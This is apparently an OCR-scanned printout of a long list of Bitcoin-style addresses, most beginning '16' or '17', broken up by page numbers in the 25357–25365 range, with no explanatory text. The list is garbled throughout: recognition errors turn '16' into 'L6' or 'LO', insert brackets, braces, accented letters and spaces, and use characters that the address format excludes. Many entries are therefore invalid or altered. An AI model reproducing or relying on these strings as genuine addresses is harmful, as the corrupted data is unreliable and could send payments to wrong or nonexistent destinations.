160XPiaLF8rXNov8vprqgTJvY2ZkaMNpXr 
160YZSRHpB3RrecxAGPxWe7m24fF 3MoEP6 
16p1laBpxfAcW4R5MabhBjfGbEosdT3SHfq 
16p1q3FvVM3NghtHNyvS4y83GRxJQifMv7G 
16P9prjtDy6ipnqDRmsjxn2srhooRHatix 


25357 


16pAK685SEgpYBcABM3Lj6rSHBUN4Zc5dE 
16pALadj5J YawWG6QHryAf3UbJQZUXxKP3R 
16PcarRJz72QfFU4aVQ9M4BuUAJV5IJZEHEQ 
16pcfKAUDYU905HNSz9tPjuxXgpqTAXo1 93 
16Pd7Rgz2t45LTpgYqpeLG3VgVrb8KwPK 
L6OPDNMrir7LhvqjMAojvXQ8kBgnTRsZz1h 
16PDrs2uZncAcW95u09bCiKqR6wc2kWpun 
16peu5uTuUWy4jdpZe2iTnWamNaatkW9s4Z 
16PFQdp1RhjJKihBdwqvy2t6KKJPPBWWTPr 
1L6PHFA84sZcBKCy9rtemQrE9xevF4BdcjA 
16pL5C5ubXK9519B20Yz5nEuuxXvthlwjbx 
16PL6WXcQHcMRbEqwQzSDC}jdyQhSiz1YPp 
L6EPM9Y2WOfLWYjTpYd1lnCVYgzd78Hfqk7A 
16PMh5ZxE7hw5SV8qSbwxF91BhznTDNTkG 
16Pn2VRLNNQkxabxmMy5QVW7gbQghNY85r 
16Pnhe6MU6bQvnr7WjAH41EvjLpC7hoHqg 
16pr200DikdN9UqKWE2SW8CpNbD3eeeyA5 
16prHbuxZtaVobwBzcT4Wi4UkpvqtaGuVpS 
16PS9XTD8WNpNPveLhyd8VxSxn6crUJEAk 
1L6PSRDj5DSWAhTYajcijDErCywsgieCSbc 
16pUk3m2G4SpdMpAM6EVxzvkM5sveZoSRa 
1L6PVEWY9evp8itphLSBoVEBc9FvXAf] 9VFK 
16pVwaoxXgCkBzJCSYbhJkWm5ig5wSuJ1Pf 
L6PWFc8nXNb2KCzhY qgbieipGc3LiQMNr1F 
LE6PWYY5LNZZnZQd6cy2bJkGzic2WudBKMc 
1L6PWZQytamtD338xYJyBDuK1JG5sCSC6fF 
16PxWUhLtcxynkezCh4G3qDZnPLPdHgkKpD 
1L6PYLiIUMTPnx8y2SvuEeoBbewrxujAcQcY 
16pyoNb7rGCtLrFDH7ydWZXSqmqzECrkKov 
16PZD8whRysetp3iT2btsu2Xf7 yWJYn7RY 
16Q1QrxNkbHG3vKhVBY6BJWWk32CGuk6s2 
16q33VdA9yuvx8cw64gcydramkgUmfY BJF 
16Q4wbk5d45bejm)JJWdzA9nu6X796979m) 
16q5deVNMHvt4jPNV91laNLNcfebp6DhsCj 
16Q83cYiaVb3pKWTE3W5nzDzm2dmQvxXayh 
25358 


16Q8XxNHCNWFqX4XvMv8zcZYPwpFYkoZEd 
16QB7hBHrwpQqaz44kZ987kqYcnbA7DhtN 
1L6qbrNfxXg5cJv9die2qgeQkt5FpkPTmDJsb 
16QcErcsJVHxdhkK3qpFKSKxKTFCNNxmeN 
16QdvqnfcRulQg4czL1im8iewAW74BdNSAf 
16QdydTturxQR2jrjef(VKcQWKpaBsmCDsX 
L6OqFpWnF1QPVwWMtHt7AP2fqzUHk8jNcMoU 
16qheepLQ2XPehdkP5HuLRQmBxPCJLDwvc 
16Qi7pbzNCHZv6b3we3HONaEW5vBsaV6Gp 
16QL17XxxkV9VqXcK9Den8Sv1jgxryDYmh 
16qLE1JrReaUF59UCrvttXa5AxCVapyCUG 
16qmVMré6tu3m9avCikSzc9grS5dF7S3ebt 
LEQNywMHLJWg5k1VQwCkomFDrhL9k87e8U 
16qo9CDSDovSyHLzvJBhCgtQerTaHRZNLg 
LEQPNVNi18i4W17vTVKggtMhbXsSkBubaG 
16QQaCkZJNQFUISHPKBHrrC6msfVHmUTe 
16QrpjJ8hG 7iSAjbSfemmAFC18QyUXBhKY 
L6qT2SFWEBfIczf4tEYMdKc6nEgoBDMPRh 
16QtxsXvuXmbAZVE6V78jqsx5jGUWP1mE7N 
L6OQv9LLRRMYj3isPTYNFjRn8dtJudiMMsq 
16R3a7Z3gVUP9E6g8fNDLh7dNvrMR5wZxx 
16r5qeubK4zVXTY8FNVtQoygh64ixY2RDh 
16R6zZ6pCKQspw3QhSMMSqkkaY48]Bo67Ad 
16R75kNaY5fVZFaSq2kmadNUbcp2sXquwn 
16R7FiakHhdgbmuufLxuVSXeDjbgkZEAj7 
16r8A5D6hY26WZrxXmGwYwZYEKojMLdYYna 
16R94TXFedagnap47Ns553quKrV4tmBdbj 
16rBhBBmEj7Lxs81M2Mgz8FyBN1p2baM1G 
16RC4BjEUX3suH3VrxbCGixmYyexnFvotE 
16RFQK4E5nWm2x1X91Xajm7Aab6U31e50X 
1L6RFwzCtyhzbjVgTTSLpLPKrLQUnNWq9vwB 
16RHMmNebuKsTsRUrazBs9bCsjsnb41gxXZm 
L6ORHt2TSH9XykMdn4LfCRLntafMZ79zvn3 
1L6rJVVWNP2UjPRNTyNpgDnGkLFFPrwJ6PH 
16rmELgx18VoudN2HxAjGrjZXMgJgdEjwD 


25559 


16rN4CyJvwgG8bmg48zK9CdSgRZ9MCLafS 
16rnWohdCptFxBmk1yH 7nBjjHRIQboshYD 
16Rqdbg2FbEihtS6URc2jHGJKKyEW4ptpd 
16rQZc68kUgFsvvX3tZgFHn7pXxxxe6éfr7Y 
16rsEE2/YwwGVe4u8jstTKPJX9KD2hQ24N 
16RU3q)myFQKTchw5HvN4FDt5LWVyqwkJr 
16rUr5Sx5eFF7LK5mprgdeESZYHthi520g 
16rUSoQWSEj6mb6CgCTsef54Z7fPVXpHcxQ 
16RXnaRMw3NFGisoy1hcLxXj92UYVxjPFDa 
16S1w1VCKfUwcvyFsPf6PdXmTWHUSJdiVY 
16S4jvoMttnnigCyBEZRoWTMnxbihWkg3w 
16S4q7z3swP3kQ7SYAmMXAUHndy3GRavYFc 
16S6ivpgMPXaDAphGayPUJqmnoWdeuawCs 
16s7dPfs5sAMhuhjxX5qwAi9yyamJ6rNsF7 
16SA4xR1h9HFvc8W9hPozug1lLxHGQ1zFaY 
1L6sBgkK9chmwwfUj42XeH8BUY9xmhi7H4Nmk 
16scbLnZnBSUGfpFBvzwhN 7nanNSxqtPPM 
16ScVXQx2xCpTJp2FJiLopoRN40oDbQFMD4t 
16sdBdUp9R4S1f9axqUTXWmWcfwrUaM2P] 
16sDbgMtg6NJBebsjni5vRabgZEK5UrfhB 
16SeAJcAFjja9maolmR6nmoydzeQHy5qHE 
16sEdzzLER2ciKaiw6CNSF9CpwobDMcYmAX 
1L6SH9QHhNveLhHThHQYS4s7wjaV6x4PeZEXaQ 
16SKSzhFXnrCAXwutsRsRmFSVnnD9MvVek 
16sLkCZPAg4GGR22hoV6SMaHihAUt5hwZk 
16SMCxKM118Qsoc1D2Yy8zUopnp5kEd2pP 
1L6smTIcbKcFGANvQgf4LdndkD1XvcPEtWp 
16s0o2MLyww5w6x96biFHNnCM2QkTpPmNBK 
L6SpHYTyJXUtDVCCUNCHGDjojq9SqBju4c 
16sptsDxs2N4crExEcH2i1LSVchPKolgsb 
1L6SQTXomp99qC4nUrtWANQiKpJZygt3uz7 
1L6SRFTSGufeGnDqKdkPrbPiKLG9Xm5xefR 
16sRRP3CTfeCuyWBFjqzr8jeQ9MUYdUKSCg 
16SRSX9Yu3X2iL4MBRi7j3NyFfcWMsNd19 
16Sv6fjyUJXcc76P343rV2cZ3hZpVEutUW 
25360 


16SVkMyC1hDqdQcNRjzDiSYu3w7mgBRHdu 
L6SWYWEkrzanBey98r4yp16DbpMhT lvvBU 
16sXxE4s64iAAddz3nFQR196CpHVY2gHge 
16SZqCsUj8rPhylwUgliN9qgiWvagljYqyY1 
16SZwzbEF4Yy3Gb63wh1M13a6yLAogfhWx 
16TlaZvmpMTg2FvKDyewUmgq6nyEzYmhgT8 
16t59v7RYexEuuXxj4Jnj3ZBWD)XKczbhit 
16TAJogQwk6VfrVfnDjPZ3CRrPddgfoDec 
16tcYaBaFEHD7qNQZAZURMVEMZoAHRVNWu 
16tDYGzsb6Ns4Lm7QGBoeoqw4UvQpeLv9t 
16te895tv2UWABnXt28AranyKtTnLai8qq 
1L6TEK6gJ)gMAhn2BiuDtbxXciH66dYXSbqv 
16TeLtjHnxXux49DwsfukvGuyp5kYg6xp7 
16TesavoooiChDTmsw7Q6wnAJpuGyD8aqe 
1L6tGhqhA5zxSWumLb6yUWU7ww8EAze8RDC 
1L6ETLxmRgqqqVFTuiaqzBdUJoYHgAXjdAz9X 
L6tmMH3vCE62SsVbDMG1k23Vyv1hPehWBHArT 
1L6TmmDiYyFwHz793xGqCjmgRujBckBB8sK 
1L6TNAJDN8Wed9QsoBBNe5VuWaWqweEjpmsZ 
16tnF3nVRFLgNinEUqSjNLENaH7FtHDpMz 
1L6tnNGapH9ROY4A1U8)JVIVFintuWdkk9d 
L6tNySwY4NtJSz98xCto43rRVvwWHV2eQLMq 
16tpjgREp2HbgdUYXLqU2kVRiDwrR8PtSi 
16tQAoredkx9Gm3gqvpBPckfKp7xQt8XeV 
16tqDJjuTnzxU3T7F5t9ShthjPJZKabC2U 
16TQoeGYY6c79FrJ/CST5KqoPq9CJWs6qzB 
L6ETRGH5SWm7gonTt6PkSRyxQk7qVovRXfD 
16trMcmWiQM3iqKAdDkmrbaFAstanfh4sC 
1L6tRVD7YETMRzddYmMN5LQWQN3NQ7W2HK6G 
16tRxfojugsvdKK5SyJnfixmrgxVwTFF2J 
16tUGkZdG5b3NEBHv2BN1J4xC1gz718gpG 
L6EtVCWNecp6sq8Q4kfmJVKZXF78M6jVtjpN 
16TXrPALgLimRoGJCAZvfQ13antLDQeFDB 
16TYByDz5TAYJER3gNgWwaE6JbKEwckrpS 
L6tYN2PMrAFrBnhcjVVTUZ4t80oXBVU7W1B 


25361 


16u15ej4A5iXU9LID3cCHsLdTmwn3ZHTHVG 
16u4289YfWFxU4SLZKEVwScPuA74R5RQwWX 
16u8Gmio3qa4LPdHkpCbv8G7qJ3UgtZAGc 
16U9CmMGnwwBRUF5sB32grXyd4R91myY1aP9 
16U9Lpaa5uooHMSX8F3zY2Y8A6c6K7gNxo 
16Ua42tSluZntiGVb6X1sRZKhovnat3i3w 
16UCkg7vhgZW4CF30EFLixzxHpaCb5XGa7 
1L6UcPUQvvWvw24KgLymePaB7DqZiRAPUZs 
16uFovYF2psoMDRCez6dSxUDVgLH22bNZB 
16uGdd23DW10Qb9VGtoWu6LphK5B3dnPaC 
L6UHNHXeWKTacBLG8yqBt5wtonxTbriivd 
16UiAkcwZ1F8V4AH5fWwkg1Del9TRFoKcb 
16uLzWscnPi6y23RZhbS9mMKz7gQXwByt5u 
16UndB9T1PuqZPLt32Mjs7SZ1nc7zTu4o0S 
16UpdMfgqdumzGv7uhGaEdtP4eBeud6c82 
16upzsoLruLa31xdL9A2uEEjTKCA5dufsS 
16uQJsVmAXg8137dBr5gfHmkgYCmDsp7d3 
16USqko07569kJS7HVN5BreRXbYanAq2F6 
16uThHGVWK4TbxXHLTKVCb9gsQsTg1lzkGbWn 
16utkAoRcdx2wjJEVSGFRpsBns5AA54Spod 
16uTw841ZLjUJu3)8FFToafrxt7SEQ53eq 
1L6UWJqyTRCQckKr4foGeUn8gp3BYWP3unrL 
16uwSg8MrAdkt6Sekgqfi63pAyRBDQS16qp 
16UY2mtAYLIJyRPLPRnbDeB6TxZms3M6rm 
16uYjskZ5e85aZfrbYVM9fthDTrhT W9GbV 
1L6UYsPy54zr9VUNgpPHZumMMhqdKDe29JV 
16UZm9rfps6S3CKZKBqVvTmbhRp4tjPfev 
16uZns6RjZtqaf6lFtteg3JWgbTZd93C6h 
16v1zBWoV4CeTXTa9bVtXYMBTnPDRfTMF3 
16V4Q4GQNVwppbUP4KvysoYGEn4b2jYznY 
16V5qH2BSY97GBXAy5Y2S1SC7QbGuFLcJq 
16v5s49UsgxKbqtDV6R8v9Z6EcmWaxB7rAb 
16V5wN4D78ppANxhmZ2UkKHAvBUbjBsGCpg 
16v7BHeDuezPAUSyT lar80W1wLaHkxpYBi 
16V7Pfwsf6Fj9JsadHpWq4ue3W2ED5biijt 
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16vd3vJzzJ55dX5KGAfBiBHu9dUczuwYr] 
16VdtxXtXTX5hNom4AxjmrmodCyTDF9CdaS 
16veRFoVWzjRDSHUkp1vNu1b85YczRwWU8G 
16VfKzJ9UEziedcZbeykWCxtKosSkESHLZ 
L6ovgv4 TyxtHZo3Fh36baRLrKY7VPD3mY86 
1l6vkcdsy8YNYFWHe4KaRJH8vBcVE8PD04g 
16vkmo3WoTkP6hfeeZDMulduSU3jfvTDQ} 
16VkmwZpCDjtrhxXJtc8k4XqR8YrpHUWdW2 
L6vLMCpP7cMN7ePuXdEfJRVr6R4XeeSvgU 
L6OVLZNW4gbLePVkKEXfZYbxaLXPNB8)]G6Ms 
16Vn4aq2d7TXE4XqyQ5dbcZGTHAQhWZn8sU 
16vo4KisPobHmmNXq3ekAdtMDC1oKBxsxwT 
16VpA5nrWb3aZQzGCRYAJTUBYpb8X7NpT 
1L6vqgojiRkuaYXetz1PduPDVjDgilWFLCt 
16VT78)jKemYvB4xAXDaD7DfhDFxb8mkFb 
L6VTCFRS2pjrokfn3RxmfxNLbgq2KykAso 
LOVTRFKMT5t40TEIZCBg1NtB7JPaChvP2q 
16VVR1tew)]3c9DWPwP9vsHYRDSm]JHeCmAu 
L6vyqvKbP3QMwjRtcm2UsBNkPAeTsdjohw 
16W4keK4rqctXRxyEr4NDGBnGJumM91qPG 
1L6W4SEw5VzZRhB1UAVdCqtTgDUeUDaBJHJB 
L6w4vkFAMiWdnxNx3C3a46Uri5q5fLP3iv 
16W8mt2zVF4PKkpsqC3BDJ5n724W1Mtwie 
L6w9g8F9OCB2zifnUbzp554t2LguLPQXk7W 
16WaV3aQypZoeMagAmDySM4kCxqwé6uoDtL 
L6OWb6ATUBofTxne9hRymz3uu8Ckg1FCeBw 
1L6WDGcZqg5mmLj1p4LrFovfNmMNbTH66JCiC 
LOWFHWHbk3uwjbP1S8XeTB4HMOoLAZsLd4j 
1L6WGw7VRNG6EYKebGDIpN1n1li3h53v9TRZK 
L6wicRtXB5bbWKvrANufSrysPq3YpF1VFX 
16WJpC9RBwLjuszEleN2zqtkWxeURpKCqK 
L6WLHSeDToGyujBBPwPyaNmphcjqDyByyy 
LOWLLWAZzRTd67tCawZGu45HHsJC2ba9V16 
16WoKnUUSeukN7yrBaXsFFwcVBpp4qfmje 
16wpiLdDMtnpS7KuQteBHdSmv1N6wDg8Dt 
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L6wqEEVudpg4MDAE9MezLz2TQ7G3jsyqzG 
1L6wttuk9ywZPCu5fFj35VhvobFjeA5zZFMA 
L6WVy8mx1bkbhRUoxfKRZfKOHhATP3Vv6BJN 
16WwncSy2kLZt4wfp9PaxB7egTiW5tDdiS 
L6wwS6ztktZ5QEZ4Hth9ygk6Zjgf2texoV 
16wYhabgBqKCGJZuAbaSb5LZjJWK5XFw5g 
L6WYhXaVypj6VSMDuxU7h3pDw9efrZQdY2 
16X2HKPPhHN9kKRwWXbMwcU25kZF p8ffLnNWRC 
16x5SHyL1fktixDmM3YEDZhNDimuBWjtUPW 
16x7wDA90eGr5GuyqCUXyrcXUERVJ2myi) 
16x9k5rQbrYf9mx37NMqpekAuxC3adxFMK 
16Xb5HmVrnRJaTMuaEURKJtGwyw93QgoEa 
16xdRFWisjF7AjfqJd1Eel1wQetgFUqmnbB 
16xGKNEw4ukbvRZEVZnzSyLhmizfgkMU3W 
16xgWGPh22supKwbG1J7mkhqv3LeD4A3YM 
16xgzL4vLQthx7A08DAz2PHuXvvuexojMN 
16XibkBjvKSvnwNwpXxC6UgEqpy5sBENYi 
16XMVpjDCGcxKjyWQSQkkmMnq31s1qCMia 
16xn4pNuBvKsLvHd73Sh3GVBzvEhfstT Mr 
16XpcH9ziikYNNof3G9Tvmxj7adK45sUzu 
16xS7J20AihVQT4cDvzeiEKcmZHwe3JdzP 
16XsCKUSMEuR9msb6khSgGd68qwkb] 9rkLq 
16xxhKstyNYu6b7wkyr8am4s42CdR45ug7 
16XyoG3yB2SvWXFdQ2fy17sytCmf2RBk1b 
16xZDEDjJRG8pggmvN3bAhZt]KNxKCrhtk5 
16xZGYRIPZARTP4nNEB1FdJAergEnUgtrn 
16Y5yuhaTdMdiNVL4vTEoaVWNvxFVWQ84z 
16y6pGWVgqbmJxN4ADT9PAgoUctWz2WbmuL 
16YacQk9ZC5ETPCCGtopQuRSvkhDU8TTGn 
16YB45prNAmtwkcN8yvFHAPaXUSTF9cQ9i 
16YBgLMu23hNdV4gwZr) 7SiTY4feh]Bjfc 
16YbYyd3aCAfKz8VheWfEd4PnWwwogjJeCx 
16yCsTKgLF9ei1zjjNNmgkAcNsWiriaRym 
16yFifud9fgk9stE9rUdCaTW3UwgqMTT1qP 
16YGrFFWmxFkgu8vcfv 7E5HEbyRQLvofxXx 
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16YH8udBjRPMLGiuWrAfGDAHMTQeVX6bm2 
1L6ykiX959FE4EF3KEV6FqYhY4oLuAdEdk7 
16ykYmHnkgBDEgKYCSrMFMU5N28RisdwBm 
16YMd585N9DPfDeUKacYwuc2Pvrzv2cVTN 
16ymML2GAtLCvR1J99a3qCRabifxCgoWupA 
L6YMXC1PpH8yhvZVP344LAWQAcHKJyDkNo 
1L6YN4jXhBqnDvicoofTiYlLXaNU2ZBHU3n8 
16yNGZr3Xuo0lUaB3YrNC}Frr9yH3rQ65FL 
16YosshZio7iTdnFONhxKrThXzvUDVvqn 
16YQCPe5Kik5qwSXzEtBdco8Zre856SowWi 
16YqfWGTeFEHungemq62mdnj7tAVrFTKhZ 
16yQTsbojuENAJgijvvkLo4TztLMrdtPgK 
16YSBCUjW40GwExa6USNchGpbxCiZtqp4H 
16YtnL2RMBDRtZdPnud1MR2BrtDmq98Bje 
16YtoAZPEDG58x3PbydkLGWZH8Xq6aZ35T 
1l6yu45cD8etdrfoaq8vwkuEvurLYYmKuDp 
L6oyV9HFZVqHkhHtmCNEidCmUya95zVja6V 
16yxGB7qyeVNp18s9qjJukfGnWjERg3enWD 
16YyrT7wW6hF6FXTFSKNRNAtcsiolZx6WsV 
16YZVaTDgQ6ofeZVJMazjJbEuZEinm78bX 
16Z3sBWVvSMimWffVWb76QD3ckdYBKY1Dy 
16z279pBMaC84AoumCFycGKhUwg9JnxjFvP 
16Z8GpP1z8kRgcTjU4MEhbMrilL8qxB6K7 
16Zaif2w3W7JHktZqvgrnNk7up2kFi914E 
LOZAJVHX2Nt9sWzjxbxPNM51U8XGLSe67H 
16ZCJns4TinqSapZz31BBKKGnQWCF/7dAkt 
16ZDESFFLhVuLHNn3RiJoaSTGxYGgKhiry 
16ZdGv6HBsj leL8EZWCTAyKvJVFHrzCcbX 
16zDzctnZf8ra2AARsv33ATYgDzKXJAxe8 
16zefFEU9LUGjD4YDHbADtfMTFm7a6q8ca 
16zenZ1MCjchhEN9v1cJ3wz7yMqvCZftbx 
16zgU4jLY9Yukpu6pgn5J5nT 7JTbCgQQow 
16ZhmevwE3gvqMYtP6X62pLP3VILRPxXRx 
L6EZHUF4PYg8vmxpmzENpv6éAqmZQsRZgi3q 
16ZJ4PD5aFokgeaPFNKGEdshfmoEAY73Be 


25365 


16zk5ashEwqPQ2i9FQKR1q2HWFIHWNtV33 
16ZnNKG7A7ajA3)8FHSLsxX8tEH9ZKBJLcxX 
16ZoVwKz3icNTZjJMQXKN2124YcPSHATKsk 
16zqL7226TQVnqEy81cHQqNWyD11BcQ1hAz 
16zqn5cmYmqu5cKYZRYmMSoavpFDukQJD} 
16ZTyCX6vwviLt9f3VGdYYn2fR38Y0G5CZ 
16ZukWzBVkuKQo8aDtS956arRoPFsUZ4gq 
16ZVD7g681H4hbko1HCTdt8iWEEzmtmU9x 
16zVfKW2AfgnPC3vyeb3feSBdVPfWEkYu} 
L6ZWbTWvW29896wyulLE66cn9CjoFVODWhM7 
16ZWpP6c7Mi6DYAbNoycqeA5KArLZPS3bt 
16zwpXyr6vxp967kPqqTAqhUBemaT2Nadn 
16zxGZFDjYJxER8YQTbM1GbiSTABfvuUQr 
16ZymMo9MQkorYv5JhgbUS9ENM5GFHnVmy 
171gPMTWGBTpFVAtR42EfyBKodDeJGgjDV 
171hdQ3hLSJ39ekBbUnGvXzyVm9Ndo9ci6 
171KLjjib8DHKmMZLkJNWj7XUzZsANRr1HYt 
171MomjLpggWkk5Aj1GF3VfG8i5 7wV9EFV 
171sYU9sfN2qMnmm6aa3AajVUNes9hfYFn 
171WXPnggGk7kujSkXZpzj93Sz5Lmd7izi 
171Y3WUtU3WehH1xv80S6dcmwACAVoS4k7 
171yE7kLDvekmMCYVxZsi7EoAPThtLQD2T 
1721QWnpNXHVMm48Rc8jbtvkf2LsfGeP7RN 
1721RPpCSRxKArK4ErmCP1kBynSsT7WgbF 
1721xwdYX5aLW2upo8Fj9ZuQqLwfvitw9y 
1726aBZNv8Dw12b5gA5cetnCkp7srNn3em 
172fBg95Vw5qzRO6TpNQDCjuj6Q3EICPw7V 
172fnK24pLXxqBvcix9Q9Uy3MzmyAJHpop 
172Gq6Zm5a9nPwN19iJGZYw9GydCD6sLGi 
172jHgELtSHMhRJ8h74kX85ACAPZJRYFRF 
172pRSmJSueo3WbROFFmMWwktjJQPyZ1nxX9K 
172PwCMztZNEF95fqvRcFdixGUEU3L3aPi 
172rLwd9ePogip3PrBiyxyzvSGrKMSdKNK 
172TOWhA8QTHS5jENyxSya3B5ew2 TuVdZyU 
1731cwds85i4XN6TznKjWNc9Yfj4dLmfg3 
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1732)JSBf¥Yal1QDJoBKYA5THaPSKFKYfLFWR 
1734fa8pKzKbenu8V6PDvrQXibuVhCRLuj 
1738S5iVw9enHpM42SgFtHEB51kbPC1eBR 
1739ALwaqjaa7Powh7Z2zDTycHrNp7mgb8d 
173blopgaMgeQWwzuaQyxFAF5y34BxrKzm 
173CFdvL4ZjPDzdB1h7TzikwaJrpE5CD14 
173dVAxH2uunQPDSKPjHcSACsTmtubXbfi 
173HLVnETBvJ CUqHewgilqvFeDE3Dbgsci 
173rweEuMJMtjgvABqE1Prd4g4UAiE7qxe 
1741vLsqZfcMjBy7jnkxXYobwnwv1lyCN6i5v 
174aNZNSXUM3S3RVF6ruvWKX3j6sE35D1s 
174DeLXfTDpoKY4TEjYSwDoGsrwFbWLL2y 
174h4TqDqxG1XDALQLnQGabw2rNXdZ8N7Z 
174q1mdUfErgqNwbYA8SzmktaHngGAjyLe 
174qah57yhnhtGJmtKQoUDyHnUhDpVM3Dc 
174y3pW4rUZ8pNt9x394goZehAeC3mZaYA 
1756q2YysxLz4miPuqiz5tqBkWFc2UDoeQ 
175 bmKf9gpHx5Hn2i9saPhspKvcM3dB93} 
175EXGUoTz6ZFdrQfBNkC32paaHXZpgAso 
175EXWsVNqCsmM8hVD6ApsBrmUXd8VU7c)J 
175hrdbXGRTgVTS2LYdgQ24wCkSvTqN3Ga 
175ikA5ZPhLuejgmjKhJBB5ZUPzZwCX1Zjr 
175KkbauV5EWUCbKUTpLt8i3PPCNWAvMo 
175PQJDyBhXU9dTeWfBLWBuaMkL9cz6ags 
175q2WfmPNFFRsDp3ABJDuQcc4b2DxyY8jt 
175RPtmST9aT5v2BiL4zFStEgr7GYX9Zw1 
175sUNSRTnck6v7iZoVPNSQrvmbTb60iKY 
175X1MAWBLYjXTqf3gekZQC4ka3Sors14v 
1766fD60uUX2GXovMkHYgCDXVbRFJBoAbXu 
1767vMSL5UGRCYP5P6GVxsghUGtpoLV17s 
176ADddTVpdhH31WikdsW9Vj2cdM8XNuYp 
176HP1TmraWHqw5ZCxTzUqJhPX6PFC4b46 
176kGFinrDmvxaHVuTSDNPbyoc3QkKfRahf 
176nN1p8DgEB4zdAiGxpnCEVmzpVxYSpQB 
176nSW5Ea91kKehHg5QWy2XiuhBjN5iv87 
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176rb1iEc8nchYEaXMCV3TxAnyxXtqADmPL 
176Xt9Wsiypd8aM2n8hV29CcSr]w1dbFC5 
1772ZKRbPWpVhnxXbXSuqdysBidANCDqgJRL 
1776SQncTFumKSowxrw9nexmWDE24z7tww 
1777eU90M1lummvktlbsXwQhxlvnTcw8hgT 
1778v1wCoMxDgNkox65h4pYghxXrFapnvkf 
177dCTYsLWd8kL4a7iQY5vcE3aCHjYF8gi 
177dHFjBgNWa6x8F1z6QcQ8kiwAD3kKutfv 
177EjGJmcrG7H4cEnkfsyRZTRSXKUtTVYL 
177K7CUSNxALCUYBGLwpFkq45XJUWv4Ppv 
177NDFyMuzJYGaxWiVQfDx8uWukr33Hi6P 
177nNf4TQMdBheL5pyPukp5WBMDcRg6ccv 
1770diAzGkjmLNvexXej98MGrMVS81XQtEo 
177ReaD3DSWFDpMF 1ppADdEjBwg5jw4Pau 
177sQ5REv3doqgPqjJqAaSbVMn4rYSDbi2QR 
177tQPNysRcnWdgP7khAZqLwHaNm4khsdH 
177USEZ1pJnf3v5cBicks3xAxCbzcupUP] 
177yg4WRvpXocKvfxbooWcUuQ8K7riLvCX 
1784ZZArZiVhSRGFRKUk1Ksf]pVZFSAEQ1 
178BraPk7yJjSHTNNDCxQmod7PFPLbVCS5 
178CmBcCgQkWggVJ QfuvGZvszkFC64VW81 
178DqEnW47quH4KcjEboqNs7uTK2s5NBjn 
178HGMCfR26dSSIFxJQahlU588p2CjgX7f 
178KQCtfqFaGJLpiULPobUReV4KYCzY4bKQ 
178nEbMEkK2NtXrSSUZYBPGE9PEVhmABmn3 
178pejXrjQQrnXBKkKuFrtxXvqv5xpr2Ey 
178RaKyWoqCSXm9nkgceP9bz76WAPqMeDL 
178sUzZW9rsgNBwrdtxZrLtbR6cZCVumpER 
178UGQP1PefTPDm71KMXFtcxZ6t4GmRtw4 
178wlaq6QdQm6M2v9gVr2Zy3gcbh1KibRF 
178Wkm5onJcvL2HxLuum7pC2GthM2cSRZA 
178YJrQCzWxdgk9Uvi76mEcflQaETw8PU6 
1797WQ657DLM663uxLPycBC1b1C6pW8Gz3 
1797XGCXPLYP7Aqw5cfdtjPKXBjTJTCcZU 
1797YricNAMgPFilbaaeHa5GvdaW73)JfDH 
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1799mifTTN7bVx9YvUg6pcASjxukBRnfYk 
179AWTqpRFNNugANkyHhCKdvcd643exR46 
179Cd3C87UByvSPyyxMGuunwwEKUQwWrA5 
179dwoQeeDyik8fdR14Efm7rNGm14bZcfW 
179ghhnWkcbsUF6VfFYWRFu8rT XksJMo5eN 
179)zjAA2g4GrtgkKEWHt5 7C3ABNzkeWHe 
179kzdaG8xB3DsyWewbleGqwD6FUQCdA3D 
179nEfMLmPAgXzbJpzhrSEdFuLaeZdip24 
179uGciZ7qYMt7Ueto1Cqx5EZt7viJAoHg 
179ZQvmkyMcGGmgPDC4K2RHrsMABXv9ir9 
17a1lNYzakSk9nxzEfTBmq8nAHasTgj3Xjc 
17a3ffcbNsoj5KFunEtRu30vWFcbzySPmX 
17A4km4P1LUVmxWuQcG9x9QKGV4NsfuwN9 
17A6p3gLv1lyHJZAocJet8UHaGVh4A4BQCn 
17A7ZuQ65XDbUeF VZrLi9jq2H94UFsg2HR 
17A8155NFs1zHJugRX9zPCd16yw2SrKidr 
17aaf3rsUG4tmGDfxCqyUYN9D7ztqjWLBk 
17aaJMZqArjH3eufDaEJ3HZg74BJT7Gmgz 
17aBGBr6DgNY8S7yST8ZDNdG6rMtPPC8iT 
17abGtCiu5Pgs11HXptfpGi5a5NiVrPBWK 
17AbUpSsgrCpH1wStxAkgTim9VmDnn9rrTQ 
17AFchgNh3bSi5zvY9Msk5Txymkkvxpuxo 
17AFj78JnAXnPtxAdpRqxXwiM8uk3i80urS 
17agwUPp4JB9F662N7NmCeWB5sQ4f6LAjk 
17aHCNz9RCzZPC1DzzZLTVZLYRDVHbFDtj9 
17aiNG3Mm6fezMTWihn9mpniryhkQDYike 
17Aja2scrCn6UeBMB82uZ8TY4bLx77ZckP 
17AjFuubumGk7wrgZtpm4Wi9NqWFVXMW2zk 
17AJNS1C1SkYpXVMt8AiYLWpLRM4vYUwsG 
17aKMRWoafYtzW4)xJgoWQMtDC25mNzZdUx 
17amHsZSKkDukfoWxgdmvZPPQpYwXqcFCa 
17AnD988f2D6FJ52yMhuceYfUfpBHz2XUF 
17AQm3XtCQD6xdJXaoMzFumovF9krmSCFk 
17aQm8k44vuu9PyXHBzXDL2YTjuralX2xi 
17aqokrSiPF5SZNW18gy7Xv7UQNb5P8Aza7 
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17aQpyj4ABA7 7w7MQhuM6513kn9S28]QYT 
17ARKZCEmHtDWDoyfhJ1zC1QQu9GAyB4cU 
17AsUggJoWCk9gmRvMijel17bnifl3KmmNFg 
17Av46PkgzxG64abFyP8bCsWakxVWNMLks 
17AV949LXurUonMCZ1JRbx92bnvfQVVqmE 
17aWwfRSmbm8V2ZQZjaBi2BoGVHf2sjfVAo 
17aWjmsvB1PmoLVtgJZ5RRraEA67dLi5Nv 
17axNFZTWM2JRR2rjfChctHoMHgL635pqz 
17AYer60mNrFHiIBRQCSb8kSwpvdY7U37Lw 
17AyujteoDHvijjnLhcuDpcYjiCQpBJMCx 
17aZ4krFCXGtrf7 QXBdWQUP5XyEMPh3VNt 
17B4r4Ay9t6jrNAT 7VW7NBEMgeB6hk3tTu 
17b4uxunteMZYTwa43}FutY88laigdSjJEu 
17B6BNRGL87sfqin7 Tsf5tqgxFeD4cEdfF 
17B6csXbHJAkZZzR8AFUG9GCGDSUDdGog5L 
17B7RPxmFhTJDQj 7sutJuKNIN7M2FN3uof 
17b7u5kS7ZYc4MscjhBmkfXP9m5iDPctw} 
17b81k8S73Q5t2RdipTwRX5XWk7mbvRJ9B 
17B8pBsbPXM9MhnLP7hWVPQZHmEDBUYjAr 
17baURTLLWMBVUj1ThfVCDdgmcWNzVSkZq 
